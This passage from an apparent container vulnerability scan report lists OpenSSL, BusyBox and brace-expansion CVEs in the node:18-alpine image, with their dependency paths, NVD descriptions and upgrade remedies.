Users can mitigate this issue by setting SSL_OP_NO_RX_CERTIFICATE_COMPRESSION + to disable receiving compressed certificates.

+

The FIPS modules in 3.6, 3.5, 3.4 and 3.3 are not affected by this issue, + as the TLS implementation is outside the OpenSSL FIPS module boundary.

+

OpenSSL 3.6, 3.5, 3.4 and 3.3 are vulnerable to this issue.

+

OpenSSL 3.0, 1.1.1 and 1.0.2 are not affected by this issue.

+

Remediation

+

Upgrade Alpine:3.21 openssl to version 3.3.6-r0 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

CVE-2025-15467

+
+ +
+
+ low severity +
+
+ Exploit: Proof of Concept +
+
+ +
+ +
    +
  • + Package Manager: alpine:3.21 +
    • +
  • + Vulnerable module: + + openssl/libcrypto3 +
    • + +
  • Introduced through: + + docker-image|node@18-alpine and openssl/libcrypto3@3.3.3-r0 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
+ +
+ +
+ +

NVD Description

+

Note: Versions mentioned in the description apply only to the upstream openssl package and not the openssl package as distributed by Alpine. + See How to fix? for Alpine:3.21 relevant fixed versions and status.

+

Issue summary: Parsing CMS AuthEnvelopedData message with maliciously + crafted AEAD parameters can trigger a stack buffer overflow.

+

Impact summary: A stack buffer overflow may lead to a crash, causing Denial + of Service, or potentially remote code execution.

+

When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as + AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is + copied into a fixed-size stack buffer without verifying that its length fits + the destination. An attacker can supply a crafted CMS message with an + oversized IV, causing a stack-based out-of-bounds write before any + authentication or tag verification occurs.

+

Applications and services that parse untrusted CMS or PKCS#7 content using + AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. + Because the overflow occurs prior to authentication, no valid key material + is required to trigger it. While exploitability to remote code execution + depends on platform and toolchain mitigations, the stack-based write + primitive represents a severe risk.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this + issue, as the CMS implementation is outside the OpenSSL FIPS module + boundary.

+

OpenSSL 3.6, 3.5, 3.4, 3.3 and 3.0 are vulnerable to this issue.

+

OpenSSL 1.1.1 and 1.0.2 are not affected by this issue.

+

Remediation

+

Upgrade Alpine:3.21 openssl to version 3.3.6-r0 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

CVE-2026-22795

+
+ +
+
+ low severity +
+
+ Exploit: Not Defined +
+
+ +
+ +
    +
  • + Package Manager: alpine:3.21 +
    • +
  • + Vulnerable module: + + openssl/libcrypto3 +
    • + +
  • Introduced through: + + docker-image|node@18-alpine and openssl/libcrypto3@3.3.3-r0 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
+ +
+ +
+ +

NVD Description

+

Note: Versions mentioned in the description apply only to the upstream openssl package and not the openssl package as distributed by Alpine. + See How to fix? for Alpine:3.21 relevant fixed versions and status.

+

Issue summary: An invalid or NULL pointer dereference can happen in + an application processing a malformed PKCS#12 file.

+

Impact summary: An application processing a malformed PKCS#12 file can be + caused to dereference an invalid or NULL pointer on memory read, resulting + in a Denial of Service.

+

A type confusion vulnerability exists in PKCS#12 parsing code where + an ASN1_TYPE union member is accessed without first validating the type, + causing an invalid pointer read.

+

The location is constrained to a 1-byte address space, meaning any + attempted pointer manipulation can only target addresses between 0x00 and 0xFF. + This range corresponds to the zero page, which is unmapped on most modern + operating systems and will reliably result in a crash, leading only to a + Denial of Service. Exploiting this issue also requires a user or application + to process a maliciously crafted PKCS#12 file. It is uncommon to accept + untrusted PKCS#12 files in applications as they are usually used to store + private keys which are trusted by definition. For these reasons, the issue + was assessed as Low severity.

+

The FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, + as the PKCS12 implementation is outside the OpenSSL FIPS module boundary.

+

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue.

+

OpenSSL 1.0.2 is not affected by this issue.

+

Remediation

+

Upgrade Alpine:3.21 openssl to version 3.3.6-r0 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

CVE-2026-22796

+
+ +
+
+ low severity +
+
+ Exploit: Not Defined +
+
+ +
+ +
    +
  • + Package Manager: alpine:3.21 +
    • +
  • + Vulnerable module: + + openssl/libcrypto3 +
    • + +
  • Introduced through: + + docker-image|node@18-alpine and openssl/libcrypto3@3.3.3-r0 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
+ +
+ +
+ +

NVD Description

+

Note: Versions mentioned in the description apply only to the upstream openssl package and not the openssl package as distributed by Alpine. + See How to fix? for Alpine:3.21 relevant fixed versions and status.

+

Issue summary: A type confusion vulnerability exists in the signature + verification of signed PKCS#7 data where an ASN1_TYPE union member is + accessed without first validating the type, causing an invalid or NULL + pointer dereference when processing malformed PKCS#7 data.

+

Impact summary: An application performing signature verification of PKCS#7 + data or calling directly the PKCS7_digest_from_attributes() function can be + caused to dereference an invalid or NULL pointer when reading, resulting in + a Denial of Service.

+

The function PKCS7_digest_from_attributes() accesses the message digest attribute + value without validating its type. When the type is not V_ASN1_OCTET_STRING, + this results in accessing invalid memory through the ASN1_TYPE union, causing + a crash.

+

Exploiting this vulnerability requires an attacker to provide a malformed + signed PKCS#7 to an application that verifies it. The impact of the + exploit is just a Denial of Service, the PKCS7 API is legacy and applications + should be using the CMS API instead. For these reasons the issue was + assessed as Low severity.

+

The FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, + as the PKCS#7 parsing implementation is outside the OpenSSL FIPS module + boundary.

+

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.

+

Remediation

+

Upgrade Alpine:3.21 openssl to version 3.3.6-r0 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

CVE-2025-68160

+
+ +
+
+ low severity +
+
+ Exploit: Not Defined +
+
+ +
+ +
    +
  • + Package Manager: alpine:3.21 +
    • +
  • + Vulnerable module: + + openssl/libcrypto3 +
    • + +
  • Introduced through: + + docker-image|node@18-alpine and openssl/libcrypto3@3.3.3-r0 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
+ +
+ +
+ +

NVD Description

+

Note: Versions mentioned in the description apply only to the upstream openssl package and not the openssl package as distributed by Alpine. + See How to fix? for Alpine:3.21 relevant fixed versions and status.

+

Issue summary: Writing large, newline-free data into a BIO chain using the + line-buffering filter where the next BIO performs short writes can trigger + a heap-based out-of-bounds write.

+

Impact summary: This out-of-bounds write can cause memory corruption which + typically results in a crash, leading to Denial of Service for an application.

+

The line-buffering BIO filter (BIO_f_linebuffer) is not used by default in + TLS/SSL data paths. In OpenSSL command-line applications, it is typically + only pushed onto stdout/stderr on VMS systems. Third-party applications that + explicitly use this filter with a BIO chain that can short-write and that + write large, newline-free data influenced by an attacker would be affected. + However, the circumstances where this could happen are unlikely to be under + attacker control, and BIO_f_linebuffer is unlikely to be handling non-curated + data controlled by an attacker. For that reason the issue was assessed as + Low severity.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, + as the BIO implementation is outside the OpenSSL FIPS module boundary.

+

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.

+

Remediation

+

Upgrade Alpine:3.21 openssl to version 3.3.6-r0 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

CVE-2024-58251

+
+ +
+
+ low severity +
+
+ Exploit: Not Defined +
+
+ +
+ +
    +
  • + Package Manager: alpine:3.21 +
    • +
  • + Vulnerable module: + + busybox/busybox +
    • + +
  • Introduced through: + + docker-image|node@18-alpine and busybox/busybox@1.37.0-r12 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/busybox@1.37.0-r12 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + alpine-baselayout/alpine-baselayout@3.6.8-r1 + + busybox/busybox-binsh@1.37.0-r12 + + busybox/busybox@1.37.0-r12 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/busybox-binsh@1.37.0-r12 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + alpine-baselayout/alpine-baselayout@3.6.8-r1 + + busybox/busybox-binsh@1.37.0-r12 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + + +
    • +
+ +
+ +
+ +

NVD Description

+

Note: Versions mentioned in the description apply only to the upstream busybox package and not the busybox package as distributed by Alpine. + See How to fix? for Alpine:3.21 relevant fixed versions and status.

+

In netstat in BusyBox through 1.37.0, local users can launch of network application with an argv[0] containing an ANSI terminal escape sequence, leading to a denial of service (terminal locked up) when netstat is used by a victim.

+

Remediation

+

Upgrade Alpine:3.21 busybox to version 1.37.0-r14 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

CVE-2025-46394

+
+ +
+
+ low severity +
+
+ Exploit: Not Defined +
+
+ +
+ +
    +
  • + Package Manager: alpine:3.21 +
    • +
  • + Vulnerable module: + + busybox/busybox +
    • + +
  • Introduced through: + + docker-image|node@18-alpine and busybox/busybox@1.37.0-r12 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/busybox@1.37.0-r12 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + alpine-baselayout/alpine-baselayout@3.6.8-r1 + + busybox/busybox-binsh@1.37.0-r12 + + busybox/busybox@1.37.0-r12 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/busybox-binsh@1.37.0-r12 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + alpine-baselayout/alpine-baselayout@3.6.8-r1 + + busybox/busybox-binsh@1.37.0-r12 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + + +
    • +
+ +
+ +
+ +

NVD Description

+

Note: Versions mentioned in the description apply only to the upstream busybox package and not the busybox package as distributed by Alpine. + See How to fix? for Alpine:3.21 relevant fixed versions and status.

+

In tar in BusyBox through 1.37.0, a TAR archive can have filenames hidden from a listing through the use of terminal escape sequences.

+

Remediation

+

Upgrade Alpine:3.21 busybox to version 1.37.0-r14 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

Regular Expression Denial of Service (ReDoS)

+
+ +
+
+ low severity +
+
+ Exploit: Proof of Concept +
+
+ +
+ +
    +
  • + Manifest file: node:18-alpine /usr/local/lib/node_modules +
    • +
  • + Package Manager: npm +
    • +
  • + Vulnerable module: + + brace-expansion +
    • + +
  • Introduced through: + + + lib@*, npm@10.8.2 and others +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + lib@* + + npm@10.8.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/map-workspaces@3.0.6 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/config@8.3.4 + + @npmcli/map-workspaces@3.0.6 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/config@8.3.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/config@8.3.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + init-package-json@6.0.3 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmversion@6.0.3 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmversion@6.0.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
